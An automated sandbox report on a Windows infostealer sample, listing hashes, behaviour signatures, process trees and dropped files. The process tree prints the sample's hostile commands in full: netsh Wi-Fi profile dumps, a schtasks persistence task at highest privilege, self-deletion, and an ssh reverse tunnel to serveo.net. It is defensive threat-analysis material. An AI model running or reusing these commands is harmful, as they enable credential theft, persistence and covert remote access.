Analysis
- max time kernel: 241s
- max time network: 304s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 24-05-2024 01:23
Static task: static1
Behavioral task: behavioral1
- Sample: bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
- Resource: win10-20240404-en
General
- Target: bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
- Size: 2.8MB
- MD5: 63ba5ec400ebbe6af65441f442652faa
- SHA1: 3b8807f8124c0e0d8c8cd816f9a7bc30476fbf5c
- SHA256: bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9
- SHA512: e240e9e07d88908057bba587e32ef1499d0c2d235eed61f1e996ce8959e1c323068ad483a96a7010ea0050440e12a0d82782e79baa186e880e4727452f3a4baf
- SSDEEP: 49152:2mVZpRE5HFjH4MLMmcX17+kSmn75+dEsgY5OK:fgvFcXV3cJ5
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
pid   process
2872  services.exe
2060  services.exe
4704  ssh.exe
1908  services.exe
4724  services.exe
424   services.exe
4628  services.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid   process
4704  ssh.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  services.exe
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  services.exe
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  services.exe
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
1     ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
pid   process
68    timeout.exe
4584  timeout.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
pid   process
824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
2060  services.exe
2060  services.exe
2060  services.exe
2060  services.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Token: SeDebugPrivilege  2872  services.exe
Token: SeDebugPrivilege  2060  services.exe
Token: SeDebugPrivilege  1908  services.exe
Token: SeDebugPrivilege  4724  services.exe
Token: SeDebugPrivilege  424   services.exe
Token: SeDebugPrivilege  4628  services.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid   process
2060  services.exe
-
Suspicious use of WriteProcessMemory 53 IoCs
Processes:
description                        pid   process                                                                target process
PID 824 wrote to memory of 1736    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  cmd.exe
PID 824 wrote to memory of 1736    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  cmd.exe
PID 1736 wrote to memory of 3164   1736  cmd.exe                                                                chcp.com
PID 1736 wrote to memory of 3164   1736  cmd.exe                                                                chcp.com
PID 1736 wrote to memory of 1372   1736  cmd.exe                                                                netsh.exe
PID 1736 wrote to memory of 1372   1736  cmd.exe                                                                netsh.exe
PID 1736 wrote to memory of 4784   1736  cmd.exe                                                                findstr.exe
PID 1736 wrote to memory of 4784   1736  cmd.exe                                                                findstr.exe
PID 824 wrote to memory of 2332    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  cmd.exe
PID 824 wrote to memory of 2332    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  cmd.exe
PID 2332 wrote to memory of 1912   2332  cmd.exe                                                                chcp.com
PID 2332 wrote to memory of 1912   2332  cmd.exe                                                                chcp.com
PID 2332 wrote to memory of 2908   2332  cmd.exe                                                                netsh.exe
PID 2332 wrote to memory of 2908   2332  cmd.exe                                                                netsh.exe
PID 2332 wrote to memory of 2596   2332  cmd.exe                                                                findstr.exe
PID 2332 wrote to memory of 2596   2332  cmd.exe                                                                findstr.exe
PID 824 wrote to memory of 2872    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  services.exe
PID 824 wrote to memory of 2872    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  services.exe
PID 824 wrote to memory of 1480    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  cmd.exe
PID 824 wrote to memory of 1480    824   bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe  cmd.exe
PID 2872 wrote to memory of 1904   2872  services.exe                                                           cmd.exe
PID 2872 wrote to memory of 1904   2872  services.exe                                                           cmd.exe
PID 1480 wrote to memory of 780    1480  cmd.exe                                                                chcp.com
PID 1480 wrote to memory of 780    1480  cmd.exe                                                                chcp.com
PID 1904 wrote to memory of 1944   1904  cmd.exe                                                                chcp.com
PID 1904 wrote to memory of 1944   1904  cmd.exe                                                                chcp.com
PID 1480 wrote to memory of 4584   1480  cmd.exe                                                                timeout.exe
PID 1480 wrote to memory of 4584   1480  cmd.exe                                                                timeout.exe
PID 1904 wrote to memory of 68     1904  cmd.exe                                                                timeout.exe
PID 1904 wrote to memory of 68     1904  cmd.exe                                                                timeout.exe
PID 1904 wrote to memory of 1496   1904  cmd.exe                                                                schtasks.exe
PID 1904 wrote to memory of 1496   1904  cmd.exe                                                                schtasks.exe
PID 1904 wrote to memory of 2060   1904  cmd.exe                                                                services.exe
PID 1904 wrote to memory of 2060   1904  cmd.exe                                                                services.exe
PID 2060 wrote to memory of 2288   2060  services.exe                                                           cmd.exe
PID 2060 wrote to memory of 2288   2060  services.exe                                                           cmd.exe
PID 2288 wrote to memory of 2588   2288  cmd.exe                                                                chcp.com
PID 2288 wrote to memory of 2588   2288  cmd.exe                                                                chcp.com
PID 2288 wrote to memory of 1340   2288  cmd.exe                                                                netsh.exe
PID 2288 wrote to memory of 1340   2288  cmd.exe                                                                netsh.exe
PID 2288 wrote to memory of 784    2288  cmd.exe                                                                findstr.exe
PID 2288 wrote to memory of 784    2288  cmd.exe                                                                findstr.exe
PID 2060 wrote to memory of 3012   2060  services.exe                                                           cmd.exe
PID 2060 wrote to memory of 3012   2060  services.exe                                                           cmd.exe
PID 3012 wrote to memory of 4340   3012  cmd.exe                                                                chcp.com
PID 3012 wrote to memory of 4340   3012  cmd.exe                                                                chcp.com
PID 3012 wrote to memory of 4132   3012  cmd.exe                                                                netsh.exe
PID 3012 wrote to memory of 4132   3012  cmd.exe                                                                netsh.exe
PID 3012 wrote to memory of 4380   3012  cmd.exe                                                                findstr.exe
PID 3012 wrote to memory of 4380   3012  cmd.exe                                                                findstr.exe
PID 2060 wrote to memory of 4704   2060  services.exe                                                           ssh.exe
PID 2060 wrote to memory of 4704   2060  services.exe                                                           ssh.exe
PID 2060 wrote to memory of 4704   2060  services.exe                                                           ssh.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  services.exe
-
outlook_win_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  services.exe
Processes
Process (depth 1): C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"
  - Accesses Microsoft Outlook profiles
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  Process (depth 2): C:\Windows\SYSTEM32\cmd.exe
    Command line: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
    - Suspicious use of WriteProcessMemory
    Process (depth 3): C:\Windows\system32\chcp.com
      Command line: chcp 65001
    Process (depth 3): C:\Windows\system32\netsh.exe
      Command line: netsh wlan show profiles
    Process (depth 3): C:\Windows\system32\findstr.exe
      Command line: findstr /R /C:"[ ]:[ ]"
  Process (depth 2): C:\Windows\SYSTEM32\cmd.exe
    Command line: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
    - Suspicious use of WriteProcessMemory
    Process (depth 3): C:\Windows\system32\chcp.com
      Command line: chcp 65001
    Process (depth 3): C:\Windows\system32\netsh.exe
      Command line: netsh wlan show networks mode=bssid
    Process (depth 3): C:\Windows\system32\findstr.exe
      Command line: findstr "SSID BSSID Signal"
  Process (depth 2): C:\Users\Admin\AppData\Roaming\services.exe
    Command line: "C:\Users\Admin\AppData\Roaming\services.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Process (depth 3): C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "services" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Roaming\services.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"
      - Suspicious use of WriteProcessMemory
      Process (depth 4): C:\Windows\system32\chcp.com
        Command line: chcp 65001
      Process (depth 4): C:\Windows\system32\timeout.exe
        Command line: timeout /t 3
        - Delays execution with timeout.exe
      Process (depth 4): C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /tn "services" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe" /rl HIGHEST /f
        - Creates scheduled task(s)
      Process (depth 4): C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
        Command line: "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        - outlook_office_path
        - outlook_win_path
        Process (depth 5): C:\Windows\SYSTEM32\cmd.exe
          Command line: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          - Suspicious use of WriteProcessMemory
          Process (depth 6): C:\Windows\system32\chcp.com
            Command line: chcp 65001
          Process (depth 6): C:\Windows\system32\netsh.exe
            Command line: netsh wlan show profiles
          Process (depth 6): C:\Windows\system32\findstr.exe
            Command line: findstr /R /C:"[ ]:[ ]"
        Process (depth 5): C:\Windows\SYSTEM32\cmd.exe
          Command line: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
          - Suspicious use of WriteProcessMemory
          Process (depth 6): C:\Windows\system32\chcp.com
            Command line: chcp 65001
          Process (depth 6): C:\Windows\system32\netsh.exe
            Command line: netsh wlan show networks mode=bssid
          Process (depth 6): C:\Windows\system32\findstr.exe
            Command line: findstr "SSID BSSID Signal"
        Process (depth 5): C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe
          Command line: "C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6060 serveo.net
          - Executes dropped EXE
          - Loads dropped DLL
  Process (depth 2): C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"
    - Suspicious use of WriteProcessMemory
    Process (depth 3): C:\Windows\system32\chcp.com
      Command line: chcp 65001
    Process (depth 3): C:\Windows\system32\timeout.exe
      Command line: timeout /t 3
      - Delays execution with timeout.exe
Process (depth 1): C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  Command line: C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Process (depth 1): C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  Command line: C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Process (depth 1): C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  Command line: C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Process (depth 1): C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  Command line: C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log
Filesize: 847B
MD5: a908a7c6e93edeb3e400780b6fe62dde
SHA1: 36e2b437f41443f6b41b45b35a0f97b2cd94123d
SHA256: cae801b0499949178298c1c1a083f7c0febb971d262be9c9588437af66c76ef0
SHA512: deb437dcb1440d37bcd61dfa43be05fd01856a1d1e59aa5b2dfa142e9ae584b0577eea024edb99d8e74e3a1b606bb7ae3b4f9cd8eb30813e67dda678b9319cbe
-
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\libcrypto.dll
Filesize: 1.5MB
MD5: 79a6e2268dfdba1d94c27f4b17265ff4
SHA1: b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256: 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512: 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
-
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe
Filesize: 914KB
MD5: d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1: 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256: 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512: de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe
Filesize: 120KB
MD5: 479d30cd484920e686388641718edc53
SHA1: c7040a1893168c204c759280d9671b0b58890c8c
SHA256: e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
SHA512: e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
-
C:\Users\Admin\AppData\Local\lbdd1brp2p\p.dat
Filesize: 4B
MD5: ba347fcc9a79fb74e95670b24848164f
SHA1: f7627f1519939e9be9489509f793ed4d1d1d85e6
SHA256: 060e33205a731400c2eb92bc12cf921a4e44cf1851d216f144337dd6ec5350a7
SHA512: 65e3cba510a50198204ac82811e71c341a9558becf2a89cf52071a07fb65b15c1d27262b797566ac08173091ead35ddb8e54fa68f5e268cd78322d79e23f70d6
-
memory/824-3-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp
Filesize: 9.9MB
-
memory/824-16-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp
Filesize: 9.9MB
-
memory/824-5-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp
Filesize: 9.9MB
-
memory/824-4-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp
Filesize: 9.9MB
-
memory/824-0-0x00007FFC92233000-0x00007FFC92234000-memory.dmp
Filesize: 4KB
-
memory/824-2-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp
Filesize: 9.9MB
-
memory/824-1-0x00000000022C0000-0x00000000022E2000-memory.dmp
Filesize: 136KB
-
memory/2872-12-0x000002DE352A0000-0x000002DE352C4000-memory.dmp
Filesize: 144KB